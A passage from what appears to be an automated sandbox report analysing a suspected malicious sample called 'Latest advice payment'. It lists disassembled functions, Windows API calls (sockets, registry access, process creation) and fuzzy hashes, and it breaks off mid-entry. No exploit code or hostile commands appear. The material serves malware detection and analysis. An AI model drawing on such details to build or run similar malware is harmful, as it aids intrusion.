                                                            • SysAllocString.OLEAUT32(00000000), ref: 005BDB57
                                                            • SysAllocString.OLEAUT32(?), ref: 005BDB75
                                                            • SysFreeString.OLEAUT32(?), ref: 005BDB7E
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 005BDBA3
                                                            • SysAllocString.OLEAUT32(?), ref: 005BDBB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 641303b8935aff8bc55a037ae5293007e983f9e6486ef992974e592a37fd7a2c
                                                            • Instruction ID: b12374f0efebe7c6ade83c0c7eb9335dd2f2eef4061fe8757697a6fb4c67a310
                                                            • Opcode Fuzzy Hash: 641303b8935aff8bc55a037ae5293007e983f9e6486ef992974e592a37fd7a2c
                                                            • Instruction Fuzzy Hash: 32219536600219AFDF10EFA8DC88CFB77ACFB09360B018565F954DB290EA70AD459B70
                                                            Function 005D6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005D7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005D7DB6
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 005D61C6
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 005D61D5
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 005D620E
                                                            • connect.WSOCK32(00000000,?,00000010), ref: 005D6217
                                                            • WSAGetLastError.WSOCK32 ref: 005D6221
                                                            • closesocket.WSOCK32(00000000), ref: 005D624A
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 005D6263
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 910771015-0
                                                            • Opcode ID: 58dfd1d4c833e52eb319fbc261fd4f5d6fb6761af4aba84fa1443c62844c3bf1
                                                            • Instruction ID: 9c61e022e9b7b08da7bf9e75d891f6a20afff4fad106060870685ca69a03ae24
                                                            • Opcode Fuzzy Hash: 58dfd1d4c833e52eb319fbc261fd4f5d6fb6761af4aba84fa1443c62844c3bf1
                                                            • Instruction Fuzzy Hash: 9031A675600118ABEF20AF64CC89BBD7BADFB85710F04442AFD459B291DB74AC05DBA1
                                                            Function 005BF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                            • API String ID: 1038674560-2734436370
                                                            • Opcode ID: b92f8a27980b25d58684804eb9a50e571035578f9167bd8e044d71ea719064a1
                                                            • Instruction ID: 4727295b3ec55c73d49569e0013358e0857d5a9138d729084a55e1ac810bdda4
                                                            • Opcode Fuzzy Hash: b92f8a27980b25d58684804eb9a50e571035578f9167bd8e044d71ea719064a1
                                                            • Instruction Fuzzy Hash: 332134B220511266D321BA34AC06EFBBF98FF95740F10443AFD46960A1EF50BE42C395
                                                            Function 005BDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005BDC09
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005BDC2F
                                                            • SysAllocString.OLEAUT32(00000000), ref: 005BDC32
                                                            • SysAllocString.OLEAUT32 ref: 005BDC53
                                                            • SysFreeString.OLEAUT32 ref: 005BDC5C
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 005BDC76
                                                            • SysAllocString.OLEAUT32(?), ref: 005BDC84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 9dc4a1e1713920869befc47370cc636d080e5f385edb9fe0ed4088f6ccd1450c
                                                            • Instruction ID: 21061b5992629d74f32d53709213dfde6d8331032a908859cb8dd9f20e28db40
                                                            • Opcode Fuzzy Hash: 9dc4a1e1713920869befc47370cc636d080e5f385edb9fe0ed4088f6ccd1450c
                                                            • Instruction Fuzzy Hash: 22216535604205AF9B14AFA8DC88DBB7BACFB18360B108125F954CB2A1EA70EC45DB74
                                                            Function 005E75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00561D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00561D73
                                                              • Part of subcall function 00561D35: GetStockObject.GDI32(00000011), ref: 00561D87
                                                              • Part of subcall function 00561D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00561D91
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 005E7632
                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 005E763F
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 005E764A
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 005E7659
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 005E7665
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: 331213ed94cd8dd2cfa4e9a81acae1e08c2e1ecd78d510ad821297013595a953
                                                            • Instruction ID: a02a86143e93249f33a0dbc036cbc84e67d545298433d28b372df6b4ba100ec5
                                                            • Opcode Fuzzy Hash: 331213ed94cd8dd2cfa4e9a81acae1e08c2e1ecd78d510ad821297013595a953
                                                            • Instruction Fuzzy Hash: F1118EB215021ABFEF159F65CC85EE77F6DFF08798F014115BA44A60A0CA729C21DBA4
                                                            Function 00589AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __init_pointers.LIBCMT ref: 00589AE6
                                                              • Part of subcall function 00583187: EncodePointer.KERNEL32(00000000), ref: 0058318A
                                                              • Part of subcall function 00583187: __initp_misc_winsig.LIBCMT ref: 005831A5
                                                              • Part of subcall function 00583187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00589EA0
                                                              • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00589EB4
                                                              • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00589EC7
                                                              • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00589EDA
                                                              • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00589EED
                                                              • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00589F00
                                                              • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00589F13
                                                              • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00589F26
                                                              • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00589F39
                                                              • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00589F4C
                                                              • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00589F5F
                                                              • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00589F72
                                                              • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00589F85
                                                              • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00589F98
                                                              • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00589FAB
                                                              • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00589FBE
                                                            • __mtinitlocks.LIBCMT ref: 00589AEB
                                                            • __mtterm.LIBCMT ref: 00589AF4
                                                              • Part of subcall function 00589B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00589AF9,00587CD0,0061A0B8,00000014), ref: 00589C56
                                                              • Part of subcall function 00589B5C: _free.LIBCMT ref: 00589C5D
                                                              • Part of subcall function 00589B5C: DeleteCriticalSection.KERNEL32(02b,?,?,00589AF9,00587CD0,0061A0B8,00000014), ref: 00589C7F
                                                            • __calloc_crt.LIBCMT ref: 00589B19
                                                            • __initptd.LIBCMT ref: 00589B3B
                                                            • GetCurrentThreadId.KERNEL32 ref: 00589B42
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                            • String ID:
                                                            • API String ID: 3567560977-0
                                                            • Opcode ID: 788a59ab2dffc6437d308787d88a2f602eea037cc38b3daf18dce0a6109b5953
                                                            • Instruction ID: e2ed12d4a46823d59b2f3b79b261a11c1e2117522f22f04946543c3e28cfe4cd
                                                            • Opcode Fuzzy Hash: 788a59ab2dffc6437d308787d88a2f602eea037cc38b3daf18dce0a6109b5953
                                                            • Instruction Fuzzy Hash: 78F0623260A71359E7287674BC0B6BA3E91FB82731B284A1AFC50F60D2EE2198414764
                                                            Function 005EB635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 005EB644
                                                            • _memset.LIBCMT ref: 005EB653
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00626F20,00626F64), ref: 005EB682
                                                            • CloseHandle.KERNEL32 ref: 005EB694
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseCreateHandleProcess
                                                            • String ID: ob$dob
                                                            • API String ID: 3277943733-1775653833
                                                            • Opcode ID: 73f5cd20225ee08da46e155d85514fd1eaf6902b217a07820e5c05396cff88e7
                                                            • Instruction ID: c284eed5760c4cb400559daa4795e422f2b186608c2b7282d839f302a21387aa
                                                            • Opcode Fuzzy Hash: 73f5cd20225ee08da46e155d85514fd1eaf6902b217a07820e5c05396cff88e7
                                                            • Instruction Fuzzy Hash: 79F089B15407517BF7102B61FD45F7B3E9EEB08355F005420FA48E9595D7714C018BB8
                                                            Function 0058406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00583F85), ref: 00584085
                                                            • GetProcAddress.KERNEL32(00000000), ref: 0058408C
                                                            • EncodePointer.KERNEL32(00000000), ref: 00584097
                                                            • DecodePointer.KERNEL32(00583F85), ref: 005840B2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoUninitialize$combase.dll
                                                            • API String ID: 3489934621-2819208100
                                                            • Opcode ID: c87a24f8e975123206028959b9793832a4e1acf451bed219d07e3772b0d97a73
                                                            • Instruction ID: 1c9e0cf4033888dc155e09c28ccdfa8fc6e6ba63b486cce78b530c7e8ecb797e
                                                            • Opcode Fuzzy Hash: c87a24f8e975123206028959b9793832a4e1acf451bed219d07e3772b0d97a73
                                                            • Instruction Fuzzy Hash: EEE08670645700DFEB24AF60EC4DB013EA5B718742F005424FA41E91A0CF7B4215EF10
                                                            Function 005C64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 3253778849-0
                                                            • Opcode ID: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                            • Instruction ID: c143f6be8f356fc28f22a87c0bb2b80b705ad258982fc2672c327381e86de257
                                                            • Opcode Fuzzy Hash: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                            • Instruction Fuzzy Hash: 2061473050065A9FCF01EFA4C88AEBE3FA9BF85308F444919FD556B292DA34A945CB51
                                                            Function 005E01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                              • Part of subcall function 005E0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005DFDAD,?,?), ref: 005E0E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005E02BD
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005E02FD
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 005E0320
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 005E0349
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 005E038C
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 005E0399
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                            • String ID:
                                                            • API String ID: 4046560759-0
                                                            • Opcode ID: eb64dc2d6e0a8884204613eb616b517fed89402433faa08beda9f14eb1f15b63
                                                            • Instruction ID: ec9534175df7cfbaee1efa7c4ca5b0991eb31eb4b57e81d5e78a0654907ce99f
                                                            • Opcode Fuzzy Hash: eb64dc2d6e0a8884204613eb616b517fed89402433faa08beda9f14eb1f15b63
                                                            • Instruction Fuzzy Hash: A9515A311083459FC718EF64C889E6EBBE8FF88314F44491DF5858B2A2DB71E949CB52
                                                            Function 005E5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenu.USER32(?), ref: 005E57FB
                                                            • GetMenuItemCount.USER32(00000000), ref: 005E5832
                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 005E585A
                                                            • GetMenuItemID.USER32(?,?), ref: 005E58C9
                                                            • GetSubMenu.USER32(?,?), ref: 005E58D7
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 005E5928
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountMessagePostString
                                                            • String ID:
                                                            • API String ID: 650687236-0
                                                            • Opcode ID: fb1e832b1e6508d29b36db55e16a8d888ae56a7c3bea730d351e629b845cd2e8
                                                            • Instruction ID: d026f38910b6491ca0cad9f30de40572a5f0947b89173728d43878414c256d84
                                                            • Opcode Fuzzy Hash: fb1e832b1e6508d29b36db55e16a8d888ae56a7c3bea730d351e629b845cd2e8
                                                            • Instruction Fuzzy Hash: 65515C35A00656EFCF19EFA5C845AAEBBB4FF48314F104469E881BB351DB30AE41DB90
                                                            Function 005BEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 005BEF06
                                                            • VariantClear.OLEAUT32(00000013), ref: 005BEF78
                                                            • VariantClear.OLEAUT32(00000000), ref: 005BEFD3
                                                            • _memmove.LIBCMT ref: 005BEFFD
                                                            • VariantClear.OLEAUT32(?), ref: 005BF04A
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 005BF078
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                            • String ID:
                                                            • API String ID: 1101466143-0
                                                            • Opcode ID: dfe125f732499222253c8bdec13a417e4a99bf179434aae6f217d8e461357db5
                                                            • Instruction ID: d6740e53c3b26f61a90129837e3c922ebeb39a8e1d11f90476a82fa222586958
                                                            • Opcode Fuzzy Hash: dfe125f732499222253c8bdec13a417e4a99bf179434aae6f217d8e461357db5
                                                            • Instruction Fuzzy Hash: AE516AB5A00209EFCB14DF58C884AAABBB8FF4C314B158569ED59DB351E734E911CFA0
                                                            Function 005C220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 005C2258
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005C22A3
                                                            • IsMenu.USER32(00000000), ref: 005C22C3
                                                            • CreatePopupMenu.USER32 ref: 005C22F7
                                                            • GetMenuItemCount.USER32(000000FF), ref: 005C2355
                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 005C2386
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                            • String ID:
                                                            • API String ID: 3311875123-0
                                                            • Opcode ID: 2fb0e438846a7d537e8928a265ad006b2d71085d1694092a75e878dacc3c3ed3
                                                            • Instruction ID: 68ae4a3274dc3d824c17dbc1aff90a6028dc981b3beaf8737c91105608734f0f
                                                            • Opcode Fuzzy Hash: 2fb0e438846a7d537e8928a265ad006b2d71085d1694092a75e878dacc3c3ed3
                                                            • Instruction Fuzzy Hash: 8951897060028ADFDF25CFA8C988FAEBFF5BF55B14F10492DE851AA290D7748905CB51
                                                            Function 00561765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00562612: GetWindowLongW.USER32(?,000000EB), ref: 00562623
                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 0056179A
                                                            • GetWindowRect.USER32(?,?), ref: 005617FE
                                                            • ScreenToClient.USER32(?,?), ref: 0056181B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0056182C
                                                            • EndPaint.USER32(?,?), ref: 00561876
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                            • String ID:
                                                            • API String ID: 1827037458-0
                                                            • Opcode ID: 03382e779f080c5cd394fc4122ad597fda48b8895ada9a7a8cb4ba2fe36ed511
                                                            • Instruction ID: 5f8ad101e67621792897ecd85058944966221fb58f596876c6dda37367853c12
                                                            • Opcode Fuzzy Hash: 03382e779f080c5cd394fc4122ad597fda48b8895ada9a7a8cb4ba2fe36ed511
